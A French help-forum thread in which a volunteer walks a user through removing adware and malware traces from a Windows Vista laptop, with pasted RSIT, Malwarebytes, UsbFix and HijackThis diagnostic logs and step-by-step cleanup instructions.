S3 MSPCLOCK;Proxy d'horloge de répartition Microsoft; C:\Windows\system32\drivers\MSPCLOCK.sys [2008-01-19 5888]
S3 MSPQM;Proxy de gestion de qualité de répartition Microsoft; C:\Windows\system32\drivers\MSPQM.sys [2008-01-19 5504]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\Windows\system32\drivers\MSTEE.sys [2008-01-19 6016]
S3 NAVENG;NAVENG; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVENG.SYS [2008-01-21 82256]
S3 NAVEX15;NAVEX15; \??\C:\PROGRA~2\Symantec\DEFINI~1\VIRUSD~1\20080217.003\NAVEX15.SYS [2008-01-21 895312]
S3 s816bus;Sony Ericsson Device 816 driver (WDM); C:\Windows\system32\DRIVERS\s816bus.sys [2007-06-19 81832]
S3 s816mdfl;Sony Ericsson Device 816 USB WMC Modem Filter; C:\Windows\system32\DRIVERS\s816mdfl.sys [2007-06-19 13864]
S3 s816mdm;Sony Ericsson Device 816 USB WMC Modem Driver; C:\Windows\system32\DRIVERS\s816mdm.sys [2007-06-19 107304]
S3 s816mgmt;Sony Ericsson Device 816 USB WMC Device Management Drivers (WDM); C:\Windows\system32\DRIVERS\s816mgmt.sys [2007-06-19 99112]
S3 s816nd5;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (NDIS); C:\Windows\system32\DRIVERS\s816nd5.sys [2007-06-19 21928]
S3 s816obex;Sony Ericsson Device 816 USB WMC OBEX Interface; C:\Windows\system32\DRIVERS\s816obex.sys [2007-06-19 97320]
S3 s816unic;Sony Ericsson Device 816 USB Ethernet Emulation SEMCMR7 (WDM); C:\Windows\system32\DRIVERS\s816unic.sys [2007-06-19 97704]
S3 SRTSP;SRTSP; C:\Windows\System32\Drivers\SRTSP.SYS [2007-11-30 279088]
S3 SRTSPL;SRTSPL; C:\Windows\System32\Drivers\SRTSPL.SYS [2007-11-30 317616]
S3 SYMDNS;SYMDNS; C:\Windows\System32\Drivers\SYMDNS.SYS [2007-10-30 12848]
S3 SYMFW;SYMFW; C:\Windows\System32\Drivers\SYMFW.SYS [2007-10-30 145968]
S3 SYMIDS;SYMIDS; C:\Windows\System32\Drivers\SYMIDS.SYS [2007-10-30 39856]
S3 SYMNDISV;SYMNDISV; C:\Windows\System32\Drivers\SYMNDISV.SYS [2007-10-30 37936]
S3 SYMREDRV;SYMREDRV; C:\Windows\System32\Drivers\SYMREDRV.SYS [2007-10-30 27696]
S3 usb_rndisx;Carte RNDIS USB; C:\Windows\system32\DRIVERS\usb8023x.sys [2009-04-11 15872]
S3 usbscan;Pilote de scanneur USB; C:\Windows\system32\DRIVERS\usbscan.sys [2008-01-19 35328]
S3 WpdUsb;WpdUsb; C:\Windows\system32\DRIVERS\wpdusb.sys [2009-10-01 40448]
S3 WUDFRd;WUDFRd; C:\Windows\system32\DRIVERS\WUDFRd.sys [2008-01-19 83328]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 avast! Antivirus;avast! Antivirus; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R2 HP Health Check Service;HP Health Check Service; c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe [2008-06-16 94208]
R2 hpqddsvc;Service HP CUE DeviceDiscovery; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2007-04-19 75304]
R2 OMSI download service;Sony Ericsson OMSI download service; C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe [2009-04-30 90112]
R2 RapiMgr;@%windir%\WindowsMobile\rapimgr.dll,-104; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 SBSDWSCService;SBSD Security Center Service; C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe [2009-01-26 1153368]
R2 WcesComm;@%windir%\WindowsMobile\wcescomm.dll,-40079; C:\Windows\system32\svchost.exe [2008-01-19 21504]
R2 XAudioService;XAudioService; C:\Windows\system32\DRIVERS\xaudio.exe [2006-11-28 386560]
R3 avast! Mail Scanner;avast! Mail Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 avast! Web Scanner;avast! Web Scanner; C:\Program Files\Alwil Software\Avast5\AvastSvc.exe [2010-02-11 40384]
R3 hpqcxs08;hpqcxs08; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S2 Net Driver HPZ12;Net Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S2 Pml Driver HPZ12;Pml Driver HPZ12; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S2 SymAppCore;Symantec AppCore Service; c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe []
S3 Com4Qlb;Com4Qlb; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe [2007-01-09 110592]
S3 FontCache;@%systemroot%\system32\FntCache.dll,-100; C:\Windows\system32\svchost.exe [2008-01-19 21504]
S3 getPlusHelper;@C:\Program Files\NOS\bin\getPlus_Helper.dll,-101; C:\Windows\System32\svchost.exe [2008-01-19 21504]
S3 gusvc;Google Updater Service; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2008-11-20 136120]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2008-11-04 441712]
S3 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 RoxMediaDB9;RoxMediaDB9; C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe [2007-02-12 880640]
S3 stllssvr;stllssvr; C:\Program Files\Common Files\SureThing Shared\stllssvr.exe [2007-02-17 74656]
S3 usnjsvc;Service Messenger Sharing Folders USN Journal Reader; C:\Program Files\Windows Live\Messenger\usnsvc.exe [2007-10-18 98328]
S4 CLCapSvc;CyberLink Background Capture Service (CBCS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLCapSvc.exe [2007-04-23 262243]
S4 CLSched;CyberLink Task Scheduler (CTS); C:\Program Files\HP\QuickPlay\Kernel\TV\CLSched.exe [2007-04-23 106593]
-----------------EOF-----------------
Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882
20/02/2010 22:14:00
mbam-log-2010-02-20 (22-12-53).txt
Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 310740
Temps écoulé: 1 hour(s), 24 minute(s), 2 second(s)
Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 1
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 1
Fichier(s) infecté(s): 2
Processus mémoire infecté(s):
(Aucun élément nuisible détecté)
Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)
Clé(s) du Registre infectée(s):
HKEY_LOCAL_MACHINE\SOFTWARE\EoRezo (Rogue.Eorezo) -> No action taken.
Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)
Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)
Dossier(s) infecté(s):
C:\ProgramData\32868532 (Rogue.Multiple) -> No action taken.
Fichier(s) infecté(s):
C:\Users\maman\AppData\Roaming\avdrn.dat (Malware.Trace) -> No action taken.
C:\Users\maman\AppData\Roaming\fvgqad.dat (Malware.Trace) -> No action taken.
|
|
Posté le 20/02/2010 à 22:40 |
Grande Maîtresse astucienne | bonsoir,
eliot je prends le relais
chimere06200
ton pc est bien infecté
* Télécharge et installe UsbFix (de C_XX & Chiquitine29) sur ton Bureau :
* Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) suceptible d avoir été infectés sans les ouvrir
* Fais un clic droit sur le raccourci UsbFix présent sur ton bureau et choisi éxécuter en tant qu'administrateur .
* Choisis l option 1 ( Recherche )
* Laisse travailler l outil.
* Ensuite post le rapport UsbFix.txt qui apparaitra.
Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque. ( C:\UsbFix.txt )
Note : "Process.exe", une composante de l'outil, est détecté par certains antivirus
(AntiVir, Dr.Web, Kaspersky Anti-Virus) comme étant un RiskTool
Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus.
Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité (Antivirus, Firewall...)
d'où l'alerte émise par ces antivirus.
ensuite
* Branche tes sources de données externes à ton PC, (clé USB, disque dur externe, etc...) suceptible d avoir été infectés sans les ouvrir
* Double clic sur le raccourci UsbFix présent sur ton bureau
* choisis l option 2 ( Suppression )
* Ton bureau disparaitra et le pc redémarrera .
* Au redémarrage , UsbFix scannera ton pc , laisse travailler l outil.
* Ensuite post le rapport UsbFix.txt qui apparaitra avec le bureau .
Note : Le rapport UsbFix.txt est sauvegardé a la racine du disque.( C:\UsbFix.txt ) ( CTRL+A Pour tout selectionner , CTRL+C pour copier et CTRL+V pour coller )
ensuite
* relance Malwarebyte's pour un SCAN COMPLET et supprime tout ce qu'il peut encore trouver. Poste le rapport ainsi qu'un nouveau rapport RSIT
|
|
Posté le 20/02/2010 à 23:29 |
Petite astucienne
| Voici la suite ....
############################## | UsbFix V6.097 |
User : maman (Administrateurs) # FREDERIC
Update on 20/02/2010 by El Desaparecido , C_XX & Chimay8
Start at: 23:14:17 | 20/02/2010
Website : http://pagesperso-orange.fr/NosTools/index.html
Contact : FindyKill.Contact@gmail.com
AMD Athlon(tm) 64 X2 Dual-Core Processor TK-55
Microsoft® Windows Vista™ Édition Familiale Premium (6.0.6002 32-bit) # Service Pack 2
Internet Explorer 8.0.6001.18882
Windows Firewall Status : Disabled
AV : Norton Internet Security 2007 [ (!) Disabled | (!) Outdated ]
FW : Norton Internet Security[ (!) Disabled ]2007
C:\ -> Disque fixe local # 141,35 Go (86,31 Go free) # NTFS
D:\ -> Disque fixe local # 7,7 Go (2,21 Go free) [HP_RECOVERY] # NTFS
E:\ -> Disque CD-ROM
F:\ -> Disque amovible # 983,72 Mo (359,67 Mo free) # FAT
############################## | Processus actifs |
C:\Windows\System32\smss.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\wininit.exe
C:\Windows\system32\csrss.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\runonce.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\svchost.exe
C:\Program Files\Common Files\LightScribe\LSSrvc.exe
C:\Windows\System32\svchost.exe
C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe
C:\Windows\System32\svchost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\DRIVERS\xaudio.exe
C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
C:\Windows\system32\WUDFHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
################## | Elements infectieux |
Supprimé ! C:\Users\maman\AppData\Local\Temp\Setup.exe
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-500
Supprimé ! C:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501
Supprimé ! C:\$Recycle.Bin\S-1-5-21-2071026311-1957086265-568470311-500
Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-1000
Supprimé ! D:\$Recycle.Bin\S-1-5-21-1567447838-2004768462-536447305-501
################## | Registre |
Supprimé ! [HKLM\software\microsoft\shared tools\msconfig\startupreg\CTFMON]
################## | Mountpoints2 |
Supprimé ! HKCU\...\Explorer\MountPoints2\{0c39c2ac-4cb5-11dd-b620-001b24dd66d7}\Shell\Auto\Command
Supprimé ! HKCU\...\Explorer\MountPoints2\{4bee0075-3ed8-11dd-b794-001b24dd66d7}\Shell\AutoRun\Command
################## | Listing des fichiers présent |
[21/08/2007 23:07|--a------|74] C:\autoexec.bat
[11/04/2009 07:36|-rahs----|333257] C:\bootmgr
[18/09/2006 22:43|--a------|10] C:\config.sys
[05/08/2008 16:22|--a------|477] C:\dkab.log
[19/01/2008 21:32|-rahs----|0] C:\IO.SYS
[19/01/2008 21:32|-rahs----|0] C:\MSDOS.SYS
[?|?|?] C:\pagefile.sys
[15/03/2009 17:25|--a------|200820] C:\UpdatedResults.cst
[20/02/2010 23:17|--a------|3662] C:\UsbFix.txt
[11/09/2005 16:18|---hs----|340] D:\AUTOMODE
[22/12/2007 21:52|---hs----|13] D:\BLOCK.RIN
[04/10/2006 00:02|---hs----|438328] D:\bootmgr
[03/11/2006 20:43|---hs----|117] D:\Desktop.ini
[10/09/2002 17:14|---hs----|8134] D:\Folder.htt
[30/11/2007 00:24|---hs----|698] D:\MASTER.LOG
[03/11/2005 16:19|---hs----|181736] D:\protect.ed
[30/11/2007 00:24|---hs----|0] D:\USER
[18/01/2010 10:44|--a------|26058] F:\RIBS.pdf
[12/01/2010 15:54|--a------|3044469] F:\AUDA_VELOSO.pdf
[20/02/2010 23:12|--a------|1624] F:\BOOTEX.LOG
################## | Vaccination |
# C:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
# D:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
# F:\autorun.inf -> Dossier créé par UsbFix (El Desaparecido).
################## | Upload |
Veuillez envoyer le fichier : C:\UsbFix_Upload_Me_FREDERIC.zip : http://chiquitine.changelog.fr/Sample/Upload.php
Merci pour votre contribution .
################## | ! Fin du rapport # UsbFix V6.097 ! |
merci pour votre patience |
|
Posté le 20/02/2010 à 23:36 |
Grande Maîtresse astucienne |
ok pour USBFix maintenant tu fais la suite
* relance Malwarebyte's pour un SCAN COMPLET et supprime tout ce qu'il peut encore trouver. Poste le rapport ainsi qu'un nouveau rapport RSIT
|
|
Posté le 20/02/2010 à 23:54 |
Petite astucienne
| ok pour l'instant ça mouline |
|
Posté le 21/02/2010 à 00:30 |
Grande Maîtresse astucienne |
alors laisse le mouliner tranquille.........LOL
demain je ne passerais sûrement pas avant milieu voir fin après midi |
|
Posté le 21/02/2010 à 00:59 |
Petite astucienne
| scan complet :
Malwarebytes' Anti-Malware 1.44
Version de la base de données: 3767
Windows 6.0.6002 Service Pack 2
Internet Explorer 8.0.6001.18882
21/02/2010 00:52:13
mbam-log-2010-02-21 (00-52-13).txt
Type de recherche: Examen complet (C:\|D:\|)
Eléments examinés: 309642
Temps écoulé: 1 hour(s), 18 minute(s), 35 second(s)
Processus mémoire infecté(s): 0
Module(s) mémoire infecté(s): 0
Clé(s) du Registre infectée(s): 0
Valeur(s) du Registre infectée(s): 0
Elément(s) de données du Registre infecté(s): 0
Dossier(s) infecté(s): 0
Fichier(s) infecté(s): 0
Processus mémoire infecté(s):
(Aucun élément nuisible détecté)
Module(s) mémoire infecté(s):
(Aucun élément nuisible détecté)
Clé(s) du Registre infectée(s):
(Aucun élément nuisible détecté)
Valeur(s) du Registre infectée(s):
(Aucun élément nuisible détecté)
Elément(s) de données du Registre infecté(s):
(Aucun élément nuisible détecté)
Dossier(s) infecté(s):
(Aucun élément nuisible détecté)
Fichier(s) infecté(s):
(Aucun élément nuisible détecté)
Logfile of random's system information tool 1.06 (written by random/random)
Run by maman at 2010-02-21 00:59:50
Microsoft® Windows Vista™ Édition Familiale Premium Service Pack 2
System drive C: has 88 GB (61%) free of 145 GB
Total RAM: 2046 MB (53% free)
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 01:00:11, on 21/02/2010
Platform: Windows Vista SP2 (WinNT 6.00.1906)
MSIE: Internet Explorer v8.00 (8.00.6001.18882)
Boot mode: Normal
Running processes:
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\explorer.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\Philips\SA28XX Device Manager\main.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqbam08.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\notepad.exe
C:\Users\maman\Saved Games\Downloads\RSIT.exe
C:\Program Files\trend micro\maman.exe
C:\Windows\system32\msfeedssync.exe
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iehome&locale=FR_FR&c=73&bd=Pavilion&pf=laptop
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://fr.msn.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Windows Internet Explorer
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: EoRezoBHO - {64F56FC1-1272-44CD-BA6E-39723696E350} - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [QlbCtrl] %ProgramFiles%\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe /Start
O4 - HKLM\..\Run: [HP Health Check Scheduler] c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe
O4 - HKLM\..\Run: [hpWirelessAssistant] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe
O4 - HKLM\..\Run: [WAWifiMessage] %ProgramFiles%\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [Windows Mobile-based device management] %windir%\WindowsMobile\wmdSync.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [avast5] C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe /nogui
O4 - HKLM\..\RunOnce: [Launcher] %WINDIR%\SMINST\launcher.exe
O4 - HKCU\..\Run: [LightScribe Control Panel] C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe -hidden
O4 - HKCU\..\Run: [ehTray.exe] C:\Windows\ehome\ehTray.exe
O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [Sony Ericsson PC Suite] "C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SEPCSuite.exe" /systray /nologon
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'SERVICE RÉSEAU')
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: Philips Gestionnaire de périphériques.lnk = C:\Program Files\Philips\SA28XX Device Manager\main.exe
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\Windows\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\Office10\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\PROGRA~1\Java\JRE16~3.0_0\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O13 - Gopher Prefix:
O16 - DPF: {D4323BF2-006A-4440-A2F5-27E3E7AB25F8} - http://a532.g.akamai.net/f/532/6712/5m/virtools.download.akamai.com/6712/player/install/installer.exe
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast5\AvastSvc.exe
O23 - Service: Com4Qlb - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\Com4Qlb.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: HP Health Check Service - Hewlett-Packard - c:\Program Files\Hewlett-Packard\HP Health Check\hphc_service.exe
O23 - Service: hpqwmiex - Hewlett-Packard Development Company, L.P. - C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: LightScribeService Direct Disc Labeling Service (LightScribeService) - Hewlett-Packard Company - C:\Program Files\Common Files\LightScribe\LSSrvc.exe
O23 - Service: Sony Ericsson OMSI download service (OMSI download service) - Unknown owner - C:\Program Files\Sony Ericsson\Sony Ericsson PC Suite\SupServ.exe
O23 - Service: RoxMediaDB9 - Sonic Solutions - C:\Program Files\Common Files\Roxio Shared\9.0\SharedCOM\RoxMediaDB9.exe
O23 - Service: SBSD Security Center Service (SBSDWSCService) - Safer Networking Ltd. - C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
O23 - Service: stllssvr - MicroVision Development, Inc. - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe
O23 - Service: Symantec AppCore Service (SymAppCore) - Unknown owner - c:\Program Files\Common Files\Symantec Shared\AppCore\AppSvc32.exe (file missing)
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe
--
End of file - 7999 bytes
======Scheduled tasks folder======
C:\Windows\tasks\HPCeeScheduleFormaman.job
C:\Windows\tasks\Maintenance en 1 clic.job
C:\Windows\tasks\User_Feed_Synchronization-{837C62D4-F802-42E1-BA8C-0E2FF49DE2F0}.job
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
Adobe PDF Link Helper - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2009-02-27 75128]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{53707962-6F74-2D53-2644-206D7942484F}]
Spybot-S&D IE Protection - C:\PROGRA~1\SPYBOT~1\SDHelper.dll [2009-01-26 1879896]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{64F56FC1-1272-44CD-BA6E-39723696E350}]
EoBho Class - C:\PROGRA~1\EoRezo\EoAdv\EOREZO~1.DLL []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
SSVHelper Class - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll [2008-06-10 509328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7E853D72-626A-48EC-A868-BA8D5E23E045}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{9030D464-4C02-4ABF-8ECC-5164760863C6}]
Programme d'aide de l'Assistant de connexion Windows Live - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-02-17 408440]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Defender"=C:\Program Files\Windows Defender\MSASCui.exe [2008-01-19 1008184]
"SynTPEnh"=C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2007-01-13 827392]
"QlbCtrl"=C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\QlbCtrl.exe [2007-02-13 159744]
"HP Health Check Scheduler"=c:\Program Files\Hewlett-Packard\HP Health Check\HPHC_Scheduler.exe [2008-06-16 75008]
"hpWirelessAssistant"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWAMain.exe [2007-03-01 472776]
"WAWifiMessage"=C:\Program Files\Hewlett-Packard\HP Wireless Assistant\WiFiMsg.exe [2007-01-10 317128]
"HP Software Update"=C:\Program Files\HP\HP Software Update\HPWuSchd2.exe [2006-12-10 49152]
"EoEngine"= []
"QuickTime Task"=C:\Program Files\QuickTime\qttask.exe [2008-03-02 98304]
"Adobe Reader Speed Launcher"=C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [2009-02-27 35696]
"Windows Mobile-based device management"=C:\Windows\WindowsMobile\wmdSync.exe [2006-11-02 215552]
"NvSvc"=C:\Windows\system32\nvsvc.dll [2007-09-19 86016]
"NvCplDaemon"=C:\Windows\system32\NvCpl.dll [2007-09-19 8497696]
"NvMediaCenter"=C:\Windows\system32\NvMcTray.dll [2007-09-19 81920]
"avast5"=C:\PROGRA~1\ALWILS~1\Avast5\avastUI.exe [2010-02-11 2756488]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Launcher"=C:\Windows\SMINST\launcher.exe [2006-11-07 44128]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"LightScribe Control Panel"=C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [2007-04-19 484904]
